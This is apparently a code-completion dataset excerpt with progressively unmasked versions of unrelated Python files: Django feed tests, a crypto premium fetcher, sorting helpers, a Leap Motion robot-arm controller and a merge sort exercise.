self.assertEqual(response['Content-Disposition'],\n 'attachment; filename=\"google.csv\"')\n", "step-5": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.test import TestCase\nfrom django.core.urlresolvers import reverse\n\nfrom google_product_feeder.feed import CSVMerchantFeed, MERCHANT_FEED_COLUMNS\n\n\nCSV_HEADINGS = ','.join(MERCHANT_FEED_COLUMNS) + '\\r\\n'\n\n\nclass AttrNameFakeModel(object):\n # A fake model that returns the attribute name upon attribute access.\n def __getattr__(self, name):\n return name\n\n\nclass EmptyFakeModel(object):\n # A fake model with no attributes.\n def __getattr__(self, name):\n raise AttributeError\n\n\nclass UppercaseBrandFeed(CSVMerchantFeed):\n def get_brand(self, obj):\n return obj.brand.upper()\n\n\nclass CSVMerchantFeedTest(TestCase):\n\n def test_csv_empty(self):\n feed = CSVMerchantFeed([])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS)\n\n def test_csv(self):\n feed = CSVMerchantFeed([AttrNameFakeModel()])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS * 2)\n\n def test_csv_missing_attribute(self):\n feed = CSVMerchantFeed([EmptyFakeModel()])\n output = feed.get_content()\n empty_data_row = ',' * (len(MERCHANT_FEED_COLUMNS) - 1) + '\\r\\n'\n self.assertEquals(output, CSV_HEADINGS + empty_data_row)\n\n def test_csv_with_get_method(self):\n feed = UppercaseBrandFeed([AttrNameFakeModel()])\n output = feed.get_content()\n data_row = CSV_HEADINGS.replace('brand', 'BRAND')\n self.assertEquals(output, CSV_HEADINGS + data_row)\n\n\nclass CSVFeedViewTest(TestCase):\n\n def test_view_empty(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEquals(response.content, CSV_HEADINGS)\n\n def test_has_correct_headers(self):\n # content-type is 'text/csv', content-disposition is 'attachment',\n # filename is 'google.csv'\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEqual(response['Content-Type'],\n 'text/csv')\n self.assertEqual(response['Content-Disposition'],\n 'attachment; filename=\"google.csv\"')\n", "step-ids": [ 10, 13, 14, 16, 17 ] }
[ 10, 13, 14, 16, 17 ]
import requests import json def get(): market = 'Premium' url = 'https://coinpremiums.herokuapp.com/json' try: result = "" premiums = requests.get(url).json() for exchange, exchange_currencies in premiums['premium'].items(): result += '[[{} | '.format(exchange.title()) _sum = 0 _cnt = 0 for currency_name, currency in exchange_currencies.items(): premium = currency['raw'] - 1 result += '[{}] {:.2%} '.format(currency_name.upper(), premium) _cnt += 1 _sum += premium result += '[평균] {:.2%} ]] '.format(_sum / _cnt) except Exception as e: result = '[{market}] 에러! : {msg}'.format(market=market, msg=e.__repr__()) return result
normal
{ "blob_id": "b5581be044013df9ff812f285f99ca67c4f96a62", "index": 2927, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef get():\n market = 'Premium'\n url = 'https://coinpremiums.herokuapp.com/json'\n try:\n result = ''\n premiums = requests.get(url).json()\n for exchange, exchange_currencies in premiums['premium'].items():\n result += '[[{} | '.format(exchange.title())\n _sum = 0\n _cnt = 0\n for currency_name, currency in exchange_currencies.items():\n premium = currency['raw'] - 1\n result += '[{}] {:.2%} '.format(currency_name.upper(), premium)\n _cnt += 1\n _sum += premium\n result += '[평균] {:.2%} ]] '.format(_sum / _cnt)\n except Exception as e:\n result = '[{market}] 에러! : {msg}'.format(market=market, msg=e.\n __repr__())\n return result\n", "step-3": "import requests\nimport json\n\n\ndef get():\n market = 'Premium'\n url = 'https://coinpremiums.herokuapp.com/json'\n try:\n result = ''\n premiums = requests.get(url).json()\n for exchange, exchange_currencies in premiums['premium'].items():\n result += '[[{} | '.format(exchange.title())\n _sum = 0\n _cnt = 0\n for currency_name, currency in exchange_currencies.items():\n premium = currency['raw'] - 1\n result += '[{}] {:.2%} '.format(currency_name.upper(), premium)\n _cnt += 1\n _sum += premium\n result += '[평균] {:.2%} ]] '.format(_sum / _cnt)\n except Exception as e:\n result = '[{market}] 에러! : {msg}'.format(market=market, msg=e.\n __repr__())\n return result\n", "step-4": "import requests\nimport json\n\n\ndef get():\n market = 'Premium'\n url = 'https://coinpremiums.herokuapp.com/json'\n\n try:\n result = \"\"\n premiums = requests.get(url).json()\n\n for exchange, exchange_currencies in premiums['premium'].items():\n result += '[[{} | '.format(exchange.title())\n _sum = 0\n _cnt = 0\n for currency_name, currency in exchange_currencies.items():\n premium = currency['raw'] - 1\n result += '[{}] {:.2%} '.format(currency_name.upper(), premium)\n _cnt += 1\n _sum += premium\n result += '[평균] {:.2%} ]] '.format(_sum / _cnt)\n except Exception as e:\n result = '[{market}] 에러! : {msg}'.format(market=market, msg=e.__repr__())\n\n return result\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
from django.contrib.auth.models import User from rt.models import Movie_Suggestion, MovieDB, ActorDB, TVDB def user_present(username): if User.objects.filter(username=username).count(): return True return False #Takes in a list of MovieDB/TVDB objects #Outputs a list of sorted titles def sort_title(movies): titles = [] for i in movies: titles.append(str(i.title)) titles.sort() return titles #Takes a list of MovieDB objects and their titles as Strings #Output a list of tuples containing the (title, id) def sort_id(movies, titles): ids = [] for i in titles: try: movie_id = MovieDB.objects.get(title=i).id ids.append((i, movie_id)) except MovieDB.DoesNotExist: return [] return ids def sort_tv_id(tvs, titles): ids = [] for i in titles: try: tv_id = TVDB.objects.get(title=i).id ids.append((i, tv_id)) except TVDB.DoesNotExist: return [] return ids def sort_name(actors): names = [] for i in actors: names.append(str(i.name)) names.sort() return names def sort_actor_id(actors, names): ids = [] for i in names: try: actor_id = ActorDB.objects.get(name=i).id ids.append((i, actor_id)) except ActorDB.DoesNotExist: return [] return ids
normal
{ "blob_id": "1e84b28580b97e77394be0490f3d8db3d62a2ccb", "index": 1213, "step-1": "<mask token>\n\n\ndef sort_id(movies, titles):\n ids = []\n for i in titles:\n try:\n movie_id = MovieDB.objects.get(title=i).id\n ids.append((i, movie_id))\n except MovieDB.DoesNotExist:\n return []\n return ids\n\n\n<mask token>\n\n\ndef sort_name(actors):\n names = []\n for i in actors:\n names.append(str(i.name))\n names.sort()\n return names\n\n\ndef sort_actor_id(actors, names):\n ids = []\n for i in names:\n try:\n actor_id = ActorDB.objects.get(name=i).id\n ids.append((i, actor_id))\n except ActorDB.DoesNotExist:\n return []\n return ids\n", "step-2": "<mask token>\n\n\ndef user_present(username):\n if User.objects.filter(username=username).count():\n return True\n return False\n\n\n<mask token>\n\n\ndef sort_id(movies, titles):\n ids = []\n for i in titles:\n try:\n movie_id = MovieDB.objects.get(title=i).id\n ids.append((i, movie_id))\n except MovieDB.DoesNotExist:\n return []\n return ids\n\n\ndef sort_tv_id(tvs, titles):\n ids = []\n for i in titles:\n try:\n tv_id = TVDB.objects.get(title=i).id\n ids.append((i, tv_id))\n except TVDB.DoesNotExist:\n return []\n return ids\n\n\ndef sort_name(actors):\n names = []\n for i in actors:\n names.append(str(i.name))\n names.sort()\n return names\n\n\ndef sort_actor_id(actors, names):\n ids = []\n for i in names:\n try:\n actor_id = ActorDB.objects.get(name=i).id\n ids.append((i, actor_id))\n except ActorDB.DoesNotExist:\n return []\n return ids\n", "step-3": "<mask token>\n\n\ndef user_present(username):\n if User.objects.filter(username=username).count():\n return True\n return False\n\n\ndef sort_title(movies):\n titles = []\n for i in movies:\n titles.append(str(i.title))\n titles.sort()\n return titles\n\n\ndef sort_id(movies, titles):\n ids = []\n for i in titles:\n try:\n movie_id = MovieDB.objects.get(title=i).id\n ids.append((i, movie_id))\n except MovieDB.DoesNotExist:\n return []\n return ids\n\n\ndef sort_tv_id(tvs, titles):\n ids = []\n for i in titles:\n try:\n tv_id = TVDB.objects.get(title=i).id\n ids.append((i, tv_id))\n except TVDB.DoesNotExist:\n return []\n return ids\n\n\ndef sort_name(actors):\n names = []\n for i in actors:\n names.append(str(i.name))\n names.sort()\n return names\n\n\ndef sort_actor_id(actors, names):\n ids = []\n for i in names:\n try:\n actor_id = ActorDB.objects.get(name=i).id\n ids.append((i, actor_id))\n except ActorDB.DoesNotExist:\n return []\n return ids\n", "step-4": "from django.contrib.auth.models import User\nfrom rt.models import Movie_Suggestion, MovieDB, ActorDB, TVDB\n\n\ndef user_present(username):\n if User.objects.filter(username=username).count():\n return True\n return False\n\n\ndef sort_title(movies):\n titles = []\n for i in movies:\n titles.append(str(i.title))\n titles.sort()\n return titles\n\n\ndef sort_id(movies, titles):\n ids = []\n for i in titles:\n try:\n movie_id = MovieDB.objects.get(title=i).id\n ids.append((i, movie_id))\n except MovieDB.DoesNotExist:\n return []\n return ids\n\n\ndef sort_tv_id(tvs, titles):\n ids = []\n for i in titles:\n try:\n tv_id = TVDB.objects.get(title=i).id\n ids.append((i, tv_id))\n except TVDB.DoesNotExist:\n return []\n return ids\n\n\ndef sort_name(actors):\n names = []\n for i in actors:\n names.append(str(i.name))\n names.sort()\n return names\n\n\ndef sort_actor_id(actors, names):\n ids = []\n for i in names:\n try:\n actor_id = ActorDB.objects.get(name=i).id\n ids.append((i, actor_id))\n except ActorDB.DoesNotExist:\n return []\n return ids\n", "step-5": "from django.contrib.auth.models import User\nfrom rt.models import Movie_Suggestion, MovieDB, ActorDB, TVDB\n\ndef user_present(username):\n\tif User.objects.filter(username=username).count():\n\t\treturn True\t\n\treturn False\n\t\n#Takes in a list of MovieDB/TVDB objects\n#Outputs a list of sorted titles\ndef sort_title(movies):\n\ttitles = []\n\tfor i in movies:\n\t\ttitles.append(str(i.title))\n\ttitles.sort()\n\treturn titles\n\t\n#Takes a list of MovieDB objects and their titles as Strings\n#Output a list of tuples containing the (title, id)\ndef sort_id(movies, titles):\n\tids = []\n\tfor i in titles:\n\t\ttry:\n\t\t\tmovie_id = MovieDB.objects.get(title=i).id\n\t\t\tids.append((i, movie_id))\n\t\texcept MovieDB.DoesNotExist:\n\t\t\treturn []\n\treturn ids\n\ndef sort_tv_id(tvs, titles):\n\tids = []\n\tfor i in titles:\n\t\ttry:\n\t\t\ttv_id = TVDB.objects.get(title=i).id\n\t\t\tids.append((i, tv_id))\n\t\texcept TVDB.DoesNotExist:\n\t\t\treturn []\n\treturn ids\n\ndef sort_name(actors):\n\tnames = []\n\tfor i in actors:\n\t\tnames.append(str(i.name))\n\tnames.sort()\n\treturn names\n\t\ndef sort_actor_id(actors, names):\n\tids = []\n\tfor i in names:\n\t\ttry:\n\t\t\tactor_id = ActorDB.objects.get(name=i).id\n\t\t\tids.append((i, actor_id))\n\t\texcept ActorDB.DoesNotExist:\n\t\t\treturn []\n\treturn ids\n", "step-ids": [ 3, 5, 6, 7, 8 ] }
[ 3, 5, 6, 7, 8 ]
#!/usr/bin/env python2 # A basic example of sending Blue a command in cartesian space. from blue_interface import BlueInterface import numpy as np import time import sys import argparse import Leap from utils.rotations import quat2euler, euler2quat, mat2euler from utils.leap_listener import SampleListener import matplotlib.pyplot as plt parser = argparse.ArgumentParser(description='switch the control mode') parser.add_argument('--IK', default=False, action='store_true', help='switch to IK-control') args = parser.parse_args() side = "right" ip = "127.0.0.1" blue = BlueInterface(side, ip) # Initialize the blue gripper blue.calibrate_gripper() # Leap Motion listener = SampleListener() controller = Leap.Controller() target_angles_init = np.array([0.0, -0.85, 1.571, 0, -1.571, -0.2, 0.0]) target_angles_hist = target_angles_init.copy() i = 0 while True: hands_data = listener.get_hand(controller) ## IK approach if args.IK: if "Right hand" in hands_data.keys(): hand_data = hands_data["Right hand"] pos = hand_data['palm_position'] ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']] grab_strength = hand_data['grab_strength'] target_position = [x/1000 for x in pos] # x, y, z pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1] # z x y to x y z ori[0], ori[1], ori[2] = ori[2], -ori[0]+3.14, ori[1] # z y x to x y z # Adjust the offset target_position[0] -= 0.4 target_position[2] += 0.3 target_orientation = list(euler2quat(ori)) # w, x, y, z # target_orientation = target_orientation[1:] + target_orientation[:1] # Compute IK solution goal_curr = blue.inverse_kinematics(target_position, target_orientation) # Send command to robot if goal_curr != []: goal = goal_curr print("goal: ", goal) blue.set_joint_positions(goal, duration=3, soft_position_control=False) blue.command_gripper(grab_strength, 10.0, wait=False) # Wait for system to settle i+=1 time.sleep(3) # Direct motor angle mapping approach else: if "Right hand" in hands_data.keys(): hand_data = hands_data["Right hand"] pos = hand_data['palm_position'] ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']] grab_strength = hand_data['grab_strength'] pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1] # z x y to x y z ori[0], ori[1], ori[2] = ori[2], ori[0], ori[1] # z y x to x y z target_position = [x/1000 for x in pos] # x, y, z target_position[0] += 0.05 target_position[2] -= 0.2 # Pre-defined Initial position of the robot target_angles = target_angles_init.copy() # orientation target_angles[0] += (ori[0]*1 + target_position[1]*1.5) # shoulder dir target_angles[4] += ori[2] # arm twist target_angles[5] += ori[1]*2 # wrist up down target_angles[6] += ori[2] # wrist twist # height target_angles[1] += target_position[2]*5 target_angles[3] -= target_position[2]*5 # depth direction stretch target_angles[3] -= target_position[0]*10 smoothening = True if smoothening: alpha = 0.9 target_angles = target_angles*(1-alpha) + target_angles_hist*alpha target_angles_hist = target_angles # Send command to robot print("target_angles: ", target_angles) blue.set_joint_positions(target_angles, duration=0.0025, soft_position_control=False) if "Left hand" in hands_data.keys(): hand_data = hands_data["Left hand"] pos = hand_data['palm_position'] ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']] grab_strength = hand_data['grab_strength'] blue.command_gripper(ori[1], 20.0, wait=False) # Wait for system to settle i+=1 time.sleep(0.025)
normal
{ "blob_id": "b34e293b509328c728909262594bdf3d3ecf5360", "index": 4364, "step-1": "<mask token>\n", "step-2": "<mask token>\nparser.add_argument('--IK', default=False, action='store_true', help=\n 'switch to IK-control')\n<mask token>\nblue.calibrate_gripper()\n<mask token>\nwhile True:\n hands_data = listener.get_hand(controller)\n if args.IK:\n if 'Right hand' in hands_data.keys():\n hand_data = hands_data['Right hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n target_position = [(x / 1000) for x in pos]\n pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1]\n ori[0], ori[1], ori[2] = ori[2], -ori[0] + 3.14, ori[1]\n target_position[0] -= 0.4\n target_position[2] += 0.3\n target_orientation = list(euler2quat(ori))\n goal_curr = blue.inverse_kinematics(target_position,\n target_orientation)\n if goal_curr != []:\n goal = goal_curr\n print('goal: ', goal)\n blue.set_joint_positions(goal, duration=3,\n soft_position_control=False)\n blue.command_gripper(grab_strength, 10.0, wait=False)\n i += 1\n time.sleep(3)\n else:\n if 'Right hand' in hands_data.keys():\n hand_data = hands_data['Right hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1]\n ori[0], ori[1], ori[2] = ori[2], ori[0], ori[1]\n target_position = [(x / 1000) for x in pos]\n target_position[0] += 0.05\n target_position[2] -= 0.2\n target_angles = target_angles_init.copy()\n target_angles[0] += ori[0] * 1 + target_position[1] * 1.5\n target_angles[4] += ori[2]\n target_angles[5] += ori[1] * 2\n target_angles[6] += ori[2]\n target_angles[1] += target_position[2] * 5\n target_angles[3] -= target_position[2] * 5\n target_angles[3] -= target_position[0] * 10\n smoothening = True\n if smoothening:\n alpha = 0.9\n target_angles = target_angles * (1 - alpha\n ) + target_angles_hist * alpha\n target_angles_hist = target_angles\n print('target_angles: ', target_angles)\n blue.set_joint_positions(target_angles, duration=0.0025,\n soft_position_control=False)\n if 'Left hand' in hands_data.keys():\n hand_data = hands_data['Left hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n blue.command_gripper(ori[1], 20.0, wait=False)\n i += 1\n time.sleep(0.025)\n", "step-3": "<mask token>\nparser = argparse.ArgumentParser(description='switch the control mode')\nparser.add_argument('--IK', default=False, action='store_true', help=\n 'switch to IK-control')\nargs = parser.parse_args()\nside = 'right'\nip = '127.0.0.1'\nblue = BlueInterface(side, ip)\nblue.calibrate_gripper()\nlistener = SampleListener()\ncontroller = Leap.Controller()\ntarget_angles_init = np.array([0.0, -0.85, 1.571, 0, -1.571, -0.2, 0.0])\ntarget_angles_hist = target_angles_init.copy()\ni = 0\nwhile True:\n hands_data = listener.get_hand(controller)\n if args.IK:\n if 'Right hand' in hands_data.keys():\n hand_data = hands_data['Right hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n target_position = [(x / 1000) for x in pos]\n pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1]\n ori[0], ori[1], ori[2] = ori[2], -ori[0] + 3.14, ori[1]\n target_position[0] -= 0.4\n target_position[2] += 0.3\n target_orientation = list(euler2quat(ori))\n goal_curr = blue.inverse_kinematics(target_position,\n target_orientation)\n if goal_curr != []:\n goal = goal_curr\n print('goal: ', goal)\n blue.set_joint_positions(goal, duration=3,\n soft_position_control=False)\n blue.command_gripper(grab_strength, 10.0, wait=False)\n i += 1\n time.sleep(3)\n else:\n if 'Right hand' in hands_data.keys():\n hand_data = hands_data['Right hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1]\n ori[0], ori[1], ori[2] = ori[2], ori[0], ori[1]\n target_position = [(x / 1000) for x in pos]\n target_position[0] += 0.05\n target_position[2] -= 0.2\n target_angles = target_angles_init.copy()\n target_angles[0] += ori[0] * 1 + target_position[1] * 1.5\n target_angles[4] += ori[2]\n target_angles[5] += ori[1] * 2\n target_angles[6] += ori[2]\n target_angles[1] += target_position[2] * 5\n target_angles[3] -= target_position[2] * 5\n target_angles[3] -= target_position[0] * 10\n smoothening = True\n if smoothening:\n alpha = 0.9\n target_angles = target_angles * (1 - alpha\n ) + target_angles_hist * alpha\n target_angles_hist = target_angles\n print('target_angles: ', target_angles)\n blue.set_joint_positions(target_angles, duration=0.0025,\n soft_position_control=False)\n if 'Left hand' in hands_data.keys():\n hand_data = hands_data['Left hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n blue.command_gripper(ori[1], 20.0, wait=False)\n i += 1\n time.sleep(0.025)\n", "step-4": "from blue_interface import BlueInterface\nimport numpy as np\nimport time\nimport sys\nimport argparse\nimport Leap\nfrom utils.rotations import quat2euler, euler2quat, mat2euler\nfrom utils.leap_listener import SampleListener\nimport matplotlib.pyplot as plt\nparser = argparse.ArgumentParser(description='switch the control mode')\nparser.add_argument('--IK', default=False, action='store_true', help=\n 'switch to IK-control')\nargs = parser.parse_args()\nside = 'right'\nip = '127.0.0.1'\nblue = BlueInterface(side, ip)\nblue.calibrate_gripper()\nlistener = SampleListener()\ncontroller = Leap.Controller()\ntarget_angles_init = np.array([0.0, -0.85, 1.571, 0, -1.571, -0.2, 0.0])\ntarget_angles_hist = target_angles_init.copy()\ni = 0\nwhile True:\n hands_data = listener.get_hand(controller)\n if args.IK:\n if 'Right hand' in hands_data.keys():\n hand_data = hands_data['Right hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n target_position = [(x / 1000) for x in pos]\n pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1]\n ori[0], ori[1], ori[2] = ori[2], -ori[0] + 3.14, ori[1]\n target_position[0] -= 0.4\n target_position[2] += 0.3\n target_orientation = list(euler2quat(ori))\n goal_curr = blue.inverse_kinematics(target_position,\n target_orientation)\n if goal_curr != []:\n goal = goal_curr\n print('goal: ', goal)\n blue.set_joint_positions(goal, duration=3,\n soft_position_control=False)\n blue.command_gripper(grab_strength, 10.0, wait=False)\n i += 1\n time.sleep(3)\n else:\n if 'Right hand' in hands_data.keys():\n hand_data = hands_data['Right hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1]\n ori[0], ori[1], ori[2] = ori[2], ori[0], ori[1]\n target_position = [(x / 1000) for x in pos]\n target_position[0] += 0.05\n target_position[2] -= 0.2\n target_angles = target_angles_init.copy()\n target_angles[0] += ori[0] * 1 + target_position[1] * 1.5\n target_angles[4] += ori[2]\n target_angles[5] += ori[1] * 2\n target_angles[6] += ori[2]\n target_angles[1] += target_position[2] * 5\n target_angles[3] -= target_position[2] * 5\n target_angles[3] -= target_position[0] * 10\n smoothening = True\n if smoothening:\n alpha = 0.9\n target_angles = target_angles * (1 - alpha\n ) + target_angles_hist * alpha\n target_angles_hist = target_angles\n print('target_angles: ', target_angles)\n blue.set_joint_positions(target_angles, duration=0.0025,\n soft_position_control=False)\n if 'Left hand' in hands_data.keys():\n hand_data = hands_data['Left hand']\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'],\n hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n blue.command_gripper(ori[1], 20.0, wait=False)\n i += 1\n time.sleep(0.025)\n", "step-5": "#!/usr/bin/env python2\n\n# A basic example of sending Blue a command in cartesian space.\nfrom blue_interface import BlueInterface\nimport numpy as np\nimport time\nimport sys\nimport argparse\n\nimport Leap\nfrom utils.rotations import quat2euler, euler2quat, mat2euler\nfrom utils.leap_listener import SampleListener\n\nimport matplotlib.pyplot as plt\n\nparser = argparse.ArgumentParser(description='switch the control mode')\nparser.add_argument('--IK', default=False, action='store_true',\n help='switch to IK-control')\nargs = parser.parse_args()\n\nside = \"right\"\nip = \"127.0.0.1\"\nblue = BlueInterface(side, ip)\n# Initialize the blue gripper\nblue.calibrate_gripper()\n\n# Leap Motion\nlistener = SampleListener()\ncontroller = Leap.Controller()\n\n\ntarget_angles_init = np.array([0.0, -0.85, 1.571, 0, -1.571, -0.2, 0.0])\ntarget_angles_hist = target_angles_init.copy()\n\ni = 0\nwhile True:\n hands_data = listener.get_hand(controller)\n\n ## IK approach\n if args.IK:\n if \"Right hand\" in hands_data.keys():\n hand_data = hands_data[\"Right hand\"]\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n target_position = [x/1000 for x in pos] # x, y, z\n pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1] # z x y to x y z\n ori[0], ori[1], ori[2] = ori[2], -ori[0]+3.14, ori[1] # z y x to x y z\n\n # Adjust the offset\n target_position[0] -= 0.4\n target_position[2] += 0.3\n target_orientation = list(euler2quat(ori)) # w, x, y, z\n # target_orientation = target_orientation[1:] + target_orientation[:1]\n\n # Compute IK solution\n goal_curr = blue.inverse_kinematics(target_position, target_orientation)\n # Send command to robot\n if goal_curr != []:\n goal = goal_curr\n print(\"goal: \", goal)\n blue.set_joint_positions(goal, duration=3, soft_position_control=False)\n blue.command_gripper(grab_strength, 10.0, wait=False)\n\n # Wait for system to settle\n i+=1\n time.sleep(3)\n\n # Direct motor angle mapping approach\n else:\n if \"Right hand\" in hands_data.keys():\n hand_data = hands_data[\"Right hand\"]\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n\n pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1] # z x y to x y z\n ori[0], ori[1], ori[2] = ori[2], ori[0], ori[1] # z y x to x y z\n target_position = [x/1000 for x in pos] # x, y, z\n target_position[0] += 0.05\n target_position[2] -= 0.2\n\n # Pre-defined Initial position of the robot\n target_angles = target_angles_init.copy()\n\n # orientation\n target_angles[0] += (ori[0]*1 + target_position[1]*1.5) # shoulder dir\n target_angles[4] += ori[2] # arm twist\n target_angles[5] += ori[1]*2 # wrist up down\n target_angles[6] += ori[2] # wrist twist\n\n # height\n target_angles[1] += target_position[2]*5\n target_angles[3] -= target_position[2]*5\n\n # depth direction stretch\n target_angles[3] -= target_position[0]*10\n\n smoothening = True\n if smoothening:\n alpha = 0.9\n target_angles = target_angles*(1-alpha) + target_angles_hist*alpha\n target_angles_hist = target_angles\n\n # Send command to robot\n print(\"target_angles: \", target_angles)\n blue.set_joint_positions(target_angles, duration=0.0025, soft_position_control=False)\n\n if \"Left hand\" in hands_data.keys():\n hand_data = hands_data[\"Left hand\"]\n pos = hand_data['palm_position']\n ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']]\n grab_strength = hand_data['grab_strength']\n blue.command_gripper(ori[1], 20.0, wait=False)\n\n # Wait for system to settle\n i+=1\n time.sleep(0.025)\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import numpy as np a = np.array([1, 2, 3]) b = np.r_[np.repeat(a, 3), np.tile(a, 3)] print(b)
normal
{ "blob_id": "f39945f35b13c0918c3ef06224bca65ae6166ebc", "index": 5892, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(b)\n", "step-3": "<mask token>\na = np.array([1, 2, 3])\nb = np.r_[np.repeat(a, 3), np.tile(a, 3)]\nprint(b)\n", "step-4": "import numpy as np\na = np.array([1, 2, 3])\nb = np.r_[np.repeat(a, 3), np.tile(a, 3)]\nprint(b)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# Merge sort is used to sort the elements def merge_sort(arr): if len(arr) > 1: # Recursion is used to continuously split the array in half. mid = len(arr) // 2 # Using Auxiliary storage here left = arr[:mid] right = arr[mid:] # Traverse the left side of the array merge_sort(left) # Traverse the right side of the array merge_sort(right) # Then we merge the left and right side merge(arr, left, right) def merge(arr, left, right): i = 0 j = 0 k = 0 # I want the array to be in descending order while i < len(left) and j < len(right): # We let the array at k be the largest values if left[i] > right[j]: arr[k] = left[i] i += 1 else: arr[k] = right[j] j += 1 k += 1 # One of the two arrays will be left with elements so we dump # which ever one still has items in it. while i < len(left): arr[k] = left[i] i += 1 k += 1 while j < len(right): arr[k] = right[j] j += 1 k += 1 def rearrange_digits(input_list): if len(input_list) == 0: return [] # We sort the list with merge sort merge_sort(input_list) first_number = '' second_number = '' for i in range(0, len(input_list)): if i % 2 == 0: first_number += str(input_list[i]) else: second_number += str(input_list[i]) # Convert them to ints and return the two numbers ans = [int(first_number), int(second_number)] return ans def test_function(test_case): output = rearrange_digits(test_case[0]) solution = test_case[1] if sum(output) == sum(solution): print("Pass") else: print("Fail") # Test case 1: test_function([[1, 2, 3, 4, 5], [542, 31]]) # Test case 2: test_function([[4, 6, 2, 5, 9, 8], [964, 852]]) # Test case 3: test_function([[1, 2, 3], [32, 1]]) # Test case 4: test_function([[], []]) # Test case 5: test_function([[9, 9, 9, 9, 9, 9], [999, 999]])
normal
{ "blob_id": "264b48c2b9ce4ec948ca5ba548e708848760f3dc", "index": 8271, "step-1": "<mask token>\n\n\ndef rearrange_digits(input_list):\n if len(input_list) == 0:\n return []\n merge_sort(input_list)\n first_number = ''\n second_number = ''\n for i in range(0, len(input_list)):\n if i % 2 == 0:\n first_number += str(input_list[i])\n else:\n second_number += str(input_list[i])\n ans = [int(first_number), int(second_number)]\n return ans\n\n\ndef test_function(test_case):\n output = rearrange_digits(test_case[0])\n solution = test_case[1]\n if sum(output) == sum(solution):\n print('Pass')\n else:\n print('Fail')\n\n\n<mask token>\n", "step-2": "def merge_sort(arr):\n if len(arr) > 1:\n mid = len(arr) // 2\n left = arr[:mid]\n right = arr[mid:]\n merge_sort(left)\n merge_sort(right)\n merge(arr, left, right)\n\n\n<mask token>\n\n\ndef rearrange_digits(input_list):\n if len(input_list) == 0:\n return []\n merge_sort(input_list)\n first_number = ''\n second_number = ''\n for i in range(0, len(input_list)):\n if i % 2 == 0:\n first_number += str(input_list[i])\n else:\n second_number += str(input_list[i])\n ans = [int(first_number), int(second_number)]\n return ans\n\n\ndef test_function(test_case):\n output = rearrange_digits(test_case[0])\n solution = test_case[1]\n if sum(output) == sum(solution):\n print('Pass')\n else:\n print('Fail')\n\n\n<mask token>\n", "step-3": "def merge_sort(arr):\n if len(arr) > 1:\n mid = len(arr) // 2\n left = arr[:mid]\n right = arr[mid:]\n merge_sort(left)\n merge_sort(right)\n merge(arr, left, right)\n\n\ndef merge(arr, left, right):\n i = 0\n j = 0\n k = 0\n while i < len(left) and j < len(right):\n if left[i] > right[j]:\n arr[k] = left[i]\n i += 1\n else:\n arr[k] = right[j]\n j += 1\n k += 1\n while i < len(left):\n arr[k] = left[i]\n i += 1\n k += 1\n while j < len(right):\n arr[k] = right[j]\n j += 1\n k += 1\n\n\ndef rearrange_digits(input_list):\n if len(input_list) == 0:\n return []\n merge_sort(input_list)\n first_number = ''\n second_number = ''\n for i in range(0, len(input_list)):\n if i % 2 == 0:\n first_number += str(input_list[i])\n else:\n second_number += str(input_list[i])\n ans = [int(first_number), int(second_number)]\n return ans\n\n\ndef test_function(test_case):\n output = rearrange_digits(test_case[0])\n solution = test_case[1]\n if sum(output) == sum(solution):\n print('Pass')\n else:\n print('Fail')\n\n\n<mask token>\n", "step-4": "def merge_sort(arr):\n if len(arr) 